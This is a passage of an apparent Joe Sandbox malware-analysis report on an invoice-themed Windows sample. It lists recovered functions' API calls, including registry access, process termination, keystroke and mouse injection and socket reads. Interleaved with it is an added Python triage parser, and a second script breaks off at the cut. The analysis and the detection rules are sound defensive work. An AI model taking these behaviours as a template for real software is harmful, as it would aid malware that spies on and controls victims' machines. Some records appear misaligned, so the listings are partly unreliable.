• Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                    • String ID:
                    • API String ID: 1380811348-0
                    • Opcode ID: 9708fab33ae2a893ad86701c0eb1d2cac5c4babf022d0d5fc4e85bc4f88252a8
                    • Instruction ID: 99b04954f240e6859f25edec50b3cba63508f79284c91008c21af9326f864e7e
                    • Opcode Fuzzy Hash: 9708fab33ae2a893ad86701c0eb1d2cac5c4babf022d0d5fc4e85bc4f88252a8
                    • Instruction Fuzzy Hash: E7515E71504300AFD720EF25D885EABB7ECEF88758F00492FF98997251EB74A905CB96
                    APIs
                      • Part of subcall function 004D3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,004D2BB5,?,?), ref: 004D3C1D
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004D30AF
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004D30EF
                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 004D3112
                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 004D313B
                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 004D317E
                    • RegCloseKey.ADVAPI32(00000000), ref: 004D318B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
• Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                    • String ID:
                    • API String ID: 3451389628-0
                    • Opcode ID: 4c0692b8c13c3979e90d8d8d9fbec96125f13e46772f12d6cb34e73d57af1e45
                    • Instruction ID: 7a3dcb9b0f9eb0b23d3922af4462da936cd37b0baf435f04403037231e413e62
                    • Opcode Fuzzy Hash: 4c0692b8c13c3979e90d8d8d9fbec96125f13e46772f12d6cb34e73d57af1e45
                    • Instruction Fuzzy Hash: 93515A31504200AFC704EF65C895EAEBBF9FF89308F04891EF59587291DB75EA05CB5A
                    APIs
                    • GetMenu.USER32(?), ref: 004D8540
                    • GetMenuItemCount.USER32(00000000), ref: 004D8577
                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 004D859F
                    • GetMenuItemID.USER32(?,?), ref: 004D860E
                    • GetSubMenu.USER32(?,?), ref: 004D861C
                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 004D866D
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
• Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Menu$Item$CountMessagePostString
                    • String ID:
                    • API String ID: 650687236-0
                    • Opcode ID: bb6a2f15047d4b63959a05ad587bf4e576ee708db35562a95f991f575f4f88fc
                    • Instruction ID: e065cd0012a3a1be8693ea2198b123623c6053a918502622b5858adb5e169c00
                    • Opcode Fuzzy Hash: bb6a2f15047d4b63959a05ad587bf4e576ee708db35562a95f991f575f4f88fc
                    • Instruction Fuzzy Hash: 52519C31A00115AFCB01EF69C951ABEB7F5EF48314F10446FE905BB351CB78AE418B98
                    APIs
                    • _memset.LIBCMT ref: 004B4B10
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004B4B5B
                    • IsMenu.USER32(00000000), ref: 004B4B7B
                    • CreatePopupMenu.USER32 ref: 004B4BAF
                    • GetMenuItemCount.USER32(000000FF), ref: 004B4C0D
                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 004B4C3E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
• Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                    • String ID:
                    • API String ID: 3311875123-0
                    • Opcode ID: 32abc51f147916b080471e6f8e33b55689b60f84fe3237e3b2f4a985e324b0a6
                    • Instruction ID: 2dda9bd1a2116bfc46ce1d90b0ddb85cb5ac1638cadfc96740c69ad0d0e4467e
                    • Opcode Fuzzy Hash: 32abc51f147916b080471e6f8e33b55689b60f84fe3237e3b2f4a985e324b0a6
                    • Instruction Fuzzy Hash: 0C51C070601209EBDF20CF68C888BEEBFF4AF84718F14415AE5159B292D3789945CB7A
                    APIs
                    • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0050DC00), ref: 004C8E7C
                    • WSAGetLastError.WSOCK32(00000000), ref: 004C8E89
                    • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 004C8EAD
                    • #16.WSOCK32(?,?,00000000,00000000), ref: 004C8EC5
                    • _strlen.LIBCMT ref: 004C8EF7
                    • WSAGetLastError.WSOCK32(00000000), ref: 004C8F6A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
• Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: ErrorLast$_strlenselect
                    • String ID:
                    • API String ID: 2217125717-0
                    • Opcode ID: e78b672a557c1e743b40b6822eee63cf659f101294dc91f81ddbbf3aefc86baa
                    • Instruction ID: e01e942b5a8fe495ee96f84d4b8569cf48d25e507879bc56fc6cb539015d5cbf
                    • Opcode Fuzzy Hash: e78b672a557c1e743b40b6822eee63cf659f101294dc91f81ddbbf3aefc86baa
                    • Instruction Fuzzy Hash: 3541B275900104ABCB54EBA5CD85FEEB7BAAF48314F10456EF51A97291DF38AE00CB68
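The function listings above are raw output of the Joe Sandbox IDA plugin: one "APIs" list per recovered function, each call written as `Name.MODULE(args), ref: address`. The editor's added example below (not part of the Joe Sandbox report and not Joe Sandbox's own signature logic) parses that exact line format and groups the calls back into functions, then tags the functions whose direct calls match a small set of behaviours visible in this report: Toolhelp32 process enumeration, launching a program via ShellExecuteExW, resetting keyboard state and posting WM_KEYDOWN for the modifier keys, registry key deletion, and reading from a socket (wsock32.dll ordinal 16, written here as `#16`, is `recv`). The constructed sample input is a short excerpt copied from the listings above; the pattern names and the choice of which API combinations count as suspicious are the editor's own assumptions.

```python
import re

# Constructed excerpt of the report's own "APIs" lists (same line format).
SAMPLE_REPORT = """\
APIs
• _memset.LIBCMT ref: 004D225A
• ShellExecuteExW.SHELL32(?), ref: 004D2368
  • Part of subcall function 0047936C: __swprintf.LIBCMT ref: 004793AB
• CloseHandle.KERNEL32(00000000), ref: 004D242F
Memory Dump Source
APIs
• GetParent.USER32(00000000), ref: 004B3C02
• GetKeyboardState.USER32(?), ref: 004B3C17
• SetKeyboardState.USER32(?), ref: 004B3C78
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 004B3CA4
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 004B3D26
Memory Dump Source
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 004D1C18
• Process32FirstW.KERNEL32(00000000,?), ref: 004D1C26
• Process32NextW.KERNEL32(00000000,?), ref: 004D1CDF
• CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 004D1CF1
Memory Dump Source
APIs
• select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0050DC00), ref: 004C8E7C
• #16.WSOCK32(?,?,00000000,00000000), ref: 004C8EC5
Memory Dump Source
"""

# One call line: optional "Part of subcall function XXXXXXXX:" prefix,
# Name.MODULE, optional "(args)", then "ref: address". Ordinal imports
# appear as "#16", CRT calls as "_memset".
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function\s+(?P<caller>[0-9A-F]{8}):\s*)?"
    r"(?P<api>#?\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

def parse_api_blocks(text):
    """Return one list of call dicts per 'APIs' block in the report text."""
    blocks, current = [], None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = []
            blocks.append(current)
            continue
        m = API_LINE.match(line)
        if m and current is not None:
            args = m.group("args")
            current.append({"api": m.group("api"), "module": m.group("module"),
                            "args": [] if args is None else args.split(","),
                            "ref": m.group("ref"), "via_subcall": m.group("caller")})
        elif current is not None and stripped:
            current = None  # any other non-empty line ends the API list

    return blocks

# Editor's assumed behaviour patterns: every listed API must be a direct call.
PATTERNS = {
    "process enumeration via Toolhelp32 snapshot":
        {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"},
    "launches a program through ShellExecuteExW": {"ShellExecuteExW"},
    "injects synthetic keystrokes (keyboard state + PostMessageW)":
        {"GetKeyboardState", "SetKeyboardState", "PostMessageW"},
    "deletes registry keys": {"RegDeleteKeyW"},
    "receives data on a socket (wsock32 ordinal 16 is recv)": {"select", "#16"},
}

WM_NAMES = {0x100: "WM_KEYDOWN", 0x101: "WM_KEYUP", 0x111: "WM_COMMAND"}
VK_NAMES = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN"}

def classify(block):
    """Names of PATTERNS whose APIs are all called directly by this function."""
    direct = {c["api"] for c in block if c["via_subcall"] is None}
    return [name for name, needed in PATTERNS.items() if needed <= direct]

def describe_message_call(call):
    """For Post/SendMessageW, name the message and, for key messages, the VK."""
    if call["api"] not in ("PostMessageW", "SendMessageW") or len(call["args"]) < 3:
        return None
    try:
        msg, wparam = int(call["args"][1], 16), int(call["args"][2], 16)
    except ValueError:  # '?' placeholders (unknown at analysis time) stay undecoded
        return None
    text = WM_NAMES.get(msg, f"msg 0x{msg:X}")
    if msg in (0x100, 0x101):
        text += " " + VK_NAMES.get(wparam, f"VK 0x{wparam:X}")
    return text

def summarize(text):
    """Map each flagged function (keyed by its first direct call's ref) to findings."""
    findings = {}
    for block in parse_api_blocks(text):
        direct = [c for c in block if c["via_subcall"] is None]
        if not direct:
            continue
        tags = classify(block)
        decoded = [d for d in (describe_message_call(c) for c in direct) if d]
        if tags or decoded:
            findings[direct[0]["ref"]] = {"tags": tags, "messages": decoded}
    return findings

if __name__ == "__main__":
    for ref, f in summarize(SAMPLE_REPORT).items():
        print(ref, f["tags"], f["messages"])
```

Run against the full report text, the same parser turns a few thousand listing lines into a short table of function addresses and behaviours, which is what you actually want when deciding where to start in the unpacked AutoIt runtime; subcall entries are kept but deliberately excluded from classification so that a helper's own API use is not attributed to every caller.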
                    APIs
                      • Part of subcall function 0048B34E: GetWindowLongW.USER32(?,000000EB), ref: 0048B35F
                    • BeginPaint.USER32(?,?,?), ref: 0048AC2A
                    • GetWindowRect.USER32(?,?), ref: 0048AC8E
                    • ScreenToClient.USER32(?,?), ref: 0048ACAB
                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0048ACBC
                    • EndPaint.USER32(?,?,?,?,?), ref: 0048AD06
                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004EE673
                    Similarity
                    • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                    • String ID:
                    • API String ID: 2592858361-0
                    • Opcode ID: 9ec591f91ca323b8fcb5c44ab80fcfe18e75c478da0a84d846b952254f45babd
                    • Instruction ID: 892e9b4c7ff00dad811759a8a9d03aac778099fc842537f523df75622a3fd8c3
                    • Opcode Fuzzy Hash: 9ec591f91ca323b8fcb5c44ab80fcfe18e75c478da0a84d846b952254f45babd
                    • Instruction Fuzzy Hash: 5B41E3705006009FD710EF65CC85F7B7BE8FB69325F040A2AF9A4872A1C7749855DB6A
                    APIs
                    • ShowWindow.USER32(00531628,00000000,00531628,00000000,00000000,00531628,?,004EDC5D,00000000,?,00000000,00000000,00000000,?,004EDAD1,00000004), ref: 004DE40B
                    • EnableWindow.USER32(00000000,00000000), ref: 004DE42F
                    • ShowWindow.USER32(00531628,00000000), ref: 004DE48F
                    • ShowWindow.USER32(00000000,00000004), ref: 004DE4A1
                    • EnableWindow.USER32(00000000,00000001), ref: 004DE4C5
                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 004DE4E8
                    Similarity
                    • API ID: Window$Show$Enable$MessageSend
                    • String ID:
                    • API String ID: 642888154-0
                    • Opcode ID: 49053f94687b9367a077acde2fd64dad7310ae9c0f22a7ccc23257d797476884
                    • Instruction ID: e5b4d0078102b703882cb6d2d38c1523ad95101d3f4fa2d11d6fcf8b8cee3d9d
                    • Opcode Fuzzy Hash: 49053f94687b9367a077acde2fd64dad7310ae9c0f22a7ccc23257d797476884
                    • Instruction Fuzzy Hash: 92416330601140EFDB21DF26C4A9B957BE1BF05304F1881BBEA588F3A2C775E851CB55
                    APIs
                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 004B98D1
                      • Part of subcall function 0048F4EA: std::exception::exception.LIBCMT ref: 0048F51E
                      • Part of subcall function 0048F4EA: __CxxThrowException@8.LIBCMT ref: 0048F533
                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 004B9908
                    • EnterCriticalSection.KERNEL32(?), ref: 004B9924
                    • LeaveCriticalSection.KERNEL32(?), ref: 004B999E
                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 004B99B3
                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 004B99D2
                    Similarity
                    • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                    • String ID:
                    • API String ID: 2537439066-0
                    • Opcode ID: 6efb28634c6df20d3c3a80d6ae09c327e65c608fa497b4ba405b1e48f1938792
                    • Instruction ID: 880d3fde50eeeed4d9c80c6643c33ff70f25009f4e6a8ddccb73ab15677d9162
                    • Opcode Fuzzy Hash: 6efb28634c6df20d3c3a80d6ae09c327e65c608fa497b4ba405b1e48f1938792
                    • Instruction Fuzzy Hash: 4431CF71900105EBDB10AFA5CD85EAFBB78FF45310B1480BAF904AB246D774DE14DBA8
                    APIs
                    • GetForegroundWindow.USER32(?,?,?,?,?,?,004C77F4,?,?,00000000,00000001), ref: 004C9B53
                      • Part of subcall function 004C6544: GetWindowRect.USER32(?,?), ref: 004C6557
                    • GetDesktopWindow.USER32 ref: 004C9B7D
                    • GetWindowRect.USER32(00000000), ref: 004C9B84
                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 004C9BB6
                      • Part of subcall function 004B7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 004B7AD0
                    • GetCursorPos.USER32(?), ref: 004C9BE2
                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 004C9C44
                    Similarity
                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                    • String ID:
                    • API String ID: 4137160315-0
                    • Opcode ID: 57b0093b9c3aff7579a73db7e4d7014312df7be5f0392d2d392daeec1da80556
                    • Instruction ID: 68f4fb945cb6c99dfa924821a6c0961b4206f90c03587b486e351ccff212170f
                    • Opcode Fuzzy Hash: 57b0093b9c3aff7579a73db7e4d7014312df7be5f0392d2d392daeec1da80556
                    • Instruction Fuzzy Hash: FE31BC72504315ABD710DF149849FABB7EAFF88314F00092EF595E7281DA35EE18CB96
                    APIs
                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 004AAFAE
                    • OpenProcessToken.ADVAPI32(00000000), ref: 004AAFB5
                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 004AAFC4
                    • CloseHandle.KERNEL32(00000004), ref: 004AAFCF
                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 004AAFFE
                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 004AB012
                    Similarity
                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                    • String ID:
                    • API String ID: 1413079979-0
                    • Opcode ID: 5760301c1f62739c7febe0c6c9613c1e5e4e9e85f4725860f72df19e1bd98f02
                    • Instruction ID: e4a89b601f380e0f4c836dd941ea915c509199dc2e55d48800531dc692b40bc7
                    • Opcode Fuzzy Hash: 5760301c1f62739c7febe0c6c9613c1e5e4e9e85f4725860f72df19e1bd98f02
                    • Instruction Fuzzy Hash: A0218072505209AFDF128F94DD09FAF7BA9EF46308F044026FE01A6161C3799D31EB65
                    APIs
                      • Part of subcall function 0048AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0048AFE3
                      • Part of subcall function 0048AF83: SelectObject.GDI32(?,00000000), ref: 0048AFF2
                      • Part of subcall function 0048AF83: BeginPath.GDI32(?), ref: 0048B009
                      • Part of subcall function 0048AF83: SelectObject.GDI32(?,00000000), ref: 0048B033
                    • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 004DEC20
                    • LineTo.GDI32(00000000,00000003,?), ref: 004DEC34
                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 004DEC42
                    • LineTo.GDI32(00000000,00000000,?), ref: 004DEC52
                    • EndPath.GDI32(00000000), ref: 004DEC62
                    • StrokePath.GDI32(00000000), ref: 004DEC72
                    Similarity
                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                    • String ID:
                    • API String ID: 43455801-0
                    • Opcode ID: b5369c3f63b3f1e5a00448dfb45a8e3148ac6aea436e794c19374a7eb3050c7d
                    • Instruction ID: 1c0cbe95751c9a0f640cd14a3a8e5746da88e51aa3eecccc837237eff1923945
                    • Opcode Fuzzy Hash: b5369c3f63b3f1e5a00448dfb45a8e3148ac6aea436e794c19374a7eb3050c7d
                    • Instruction Fuzzy Hash: E1111B7240014DBFEF129FA0DD88EEA7F6DEB08354F048122BE098A260D7719D65DBA4
                    APIs
                    • GetDC.USER32(00000000), ref: 004AE1C0
                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 004AE1D1
                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004AE1D8
                    • ReleaseDC.USER32(00000000,00000000), ref: 004AE1E0
                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 004AE1F7
                    • MulDiv.KERNEL32(000009EC,?,?), ref: 004AE209
                      • Part of subcall function 004A9AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,004A9A05,00000000,00000000,?,004A9DDB), ref: 004AA53A
                    Similarity
                    • API ID: CapsDevice$ExceptionRaiseRelease
                    • String ID:
                    • API String ID: 603618608-0
                    • Opcode ID: e812c4f78e2a964ac66f84ee1d9620f2b61898048aebf6a11eff5b1022bd52ae
                    • Instruction ID: 6469e660ba0ef88df759b4db18443abd5c08e3e17cb779c6d2ce3bca57570bf6
                    • Opcode Fuzzy Hash: e812c4f78e2a964ac66f84ee1d9620f2b61898048aebf6a11eff5b1022bd52ae
                    • Instruction Fuzzy Hash: 23018FB5E00214BFEB109BA68C49B6EBFB9EB59751F004066EA04E7390DA709C11CBA4
                    APIs
                    • __init_pointers.LIBCMT ref: 00497B47
                      • Part of subcall function 0049123A: __initp_misc_winsig.LIBCMT ref: 0049125E
                      • Part of subcall function 0049123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00497F51
                      • Part of subcall function 0049123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00497F65
                      • Part of subcall function 0049123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00497F78
                      • Part of subcall function 0049123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00497F8B
                      • Part of subcall function 0049123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00497F9E
                      • Part of subcall function 0049123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00497FB1
                      • Part of subcall function 0049123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00497FC4
                      • Part of subcall function 0049123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00497FD7
                      • Part of subcall function 0049123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00497FEA
                      • Part of subcall function 0049123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00497FFD
                      • Part of subcall function 0049123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00498010
                      • Part of subcall function 0049123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00498023
                      • Part of subcall function 0049123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00498036
                      • Part of subcall function 0049123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00498049
                      • Part of subcall function 0049123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0049805C
                      • Part of subcall function 0049123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0049806F
                    • __mtinitlocks.LIBCMT ref: 00497B4C
                      • Part of subcall function 00497E23: InitializeCriticalSectionAndSpinCount.KERNEL32(0052AC68,00000FA0,?,?,00497B51,00495E77,00526C70,00000014), ref: 00497E41
                    • __mtterm.LIBCMT ref: 00497B55
                      • Part of subcall function 00497BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00497B5A,00495E77,00526C70,00000014), ref: 00497D3F
                      • Part of subcall function 00497BBD: _free.LIBCMT ref: 00497D46
                      • Part of subcall function 00497BBD: DeleteCriticalSection.KERNEL32(0052AC68,?,?,00497B5A,00495E77,00526C70,00000014), ref: 00497D68
                    • __calloc_crt.LIBCMT ref: 00497B7A
                    • GetCurrentThreadId.KERNEL32 ref: 00497BA3
                    Similarity
                    • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                    • String ID:
                    • API String ID: 2942034483-0
                    • Opcode ID: e511608d7dc1b8ab57142567278d78f86da8d59b345e179a615c09ba7854f20b
                    • Instruction ID: 1935c91410c14499794c608037102ef26e9f49bad2b82a3c9437dfe7fbd6df5b
                    • Opcode Fuzzy Hash: e511608d7dc1b8ab57142567278d78f86da8d59b345e179a615c09ba7854f20b
                    • Instruction Fuzzy Hash: D2F0623253D2121EEE2577757C0664B2F84AF0273CB2006BFF864D51E2EB2D9942476D
                    APIs
                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0047281D
                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00472825
                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00472830
                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0047283B
                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00472843
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0047284B
                    Similarity
                    • API ID: Virtual
                    • String ID:
                    • API String ID: 4278518827-0
                    • Opcode ID: bcbc10fa48785b462ca892bc356f71ad7650a61a60b08d939926c1ade413fd1f
                    • Instruction ID: 3ce1c627d9eb2cca6beda25ae1a9ff5b9ac8a6bacb10dfddada7fbc01d05c3bb
                    • Opcode Fuzzy Hash: bcbc10fa48785b462ca892bc356f71ad7650a61a60b08d939926c1ade413fd1f
                    • Instruction Fuzzy Hash: 520167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C87A42C7F5A864CBE5
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                    • String ID:
                    • API String ID: 1423608774-0
                    • Opcode ID: 98d0723f69459549a1dc79937195a252f36fcdda9c70b30b514cdd4914ed88d2
                    • Instruction ID: 116592b96f6ed62687d8edb3b61853f0885a8d18c97a636f8e5f90e44ccf0447
                    • Opcode Fuzzy Hash: 98d0723f69459549a1dc79937195a252f36fcdda9c70b30b514cdd4914ed88d2
                    • Instruction Fuzzy Hash: CC01A932601211ABDB151B58EC48EFF776AFF8D701B15047BF60392190DB789C10DBA8
                    APIs
                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 004B7C07
                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 004B7C1D
                    • GetWindowThreadProcessId.USER32(?,?), ref: 004B7C2C
                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004B7C3B
                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004B7C45
                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004B7C4C
                    Similarity
                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                    • String ID:
                    • API String ID: 839392675-0
                    • Opcode ID: 07a6d9dce5f8ad4e3cf4a249876ef4db256c1ea7ea631021dc6fa1b76c0045b9
                    • Instruction ID: db130de70ca549be4f25b3b6a73f75bd471b8175e1c988f1fcbc8a0cdd2eef1b
                    • Opcode Fuzzy Hash: 07a6d9dce5f8ad4e3cf4a249876ef4db256c1ea7ea631021dc6fa1b76c0045b9
                    • Instruction Fuzzy Hash: B9F05E72A41158BBE7215B529C0EEFF7F7DEFC6B15F000029FA01D1151DBA05A51C6B9
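The records on this page list raw API bullets with hex arguments, which is slow to read by eye. The following Python script is an added example for this report, not code from Joe Sandbox or from the analysed sample: it parses the bullet format used in the "APIs" blocks, replaces a handful of argument constants with their Windows SDK names, and flags call combinations that stand out during triage. The constant table, the rule labels and the mapping of WSOCK32 ordinal 16 to recv are this example's own assumptions. The two embedded records are copied verbatim from this section: the PostMessageW/OpenProcess/TerminateProcess function at 004B7C07 directly above, and the select/#16 function at 004C8E7C at the start of this section.

```python
"""Parse the 'APIs' bullets of Joe Sandbox IDA-plugin records (the format
printed throughout this report) and flag call patterns worth a second look
during triage.  Constant names follow the Windows SDK headers."""
import re
from dataclasses import dataclass

# One bullet: optional "Part of subcall function XXXXXXXX:" prefix,
# Name.MODULE, optional (args), optional ", ref: ADDR".
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[A-Za-z_@#][\w@#:]*?)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?(?:,?\s*ref:\s*(?P<ref>[0-9A-F]{8}))?\s*$"
)
HEX_ARG = re.compile(r"^-?[0-9A-F]{1,8}$")   # '?' and symbolic args do not match

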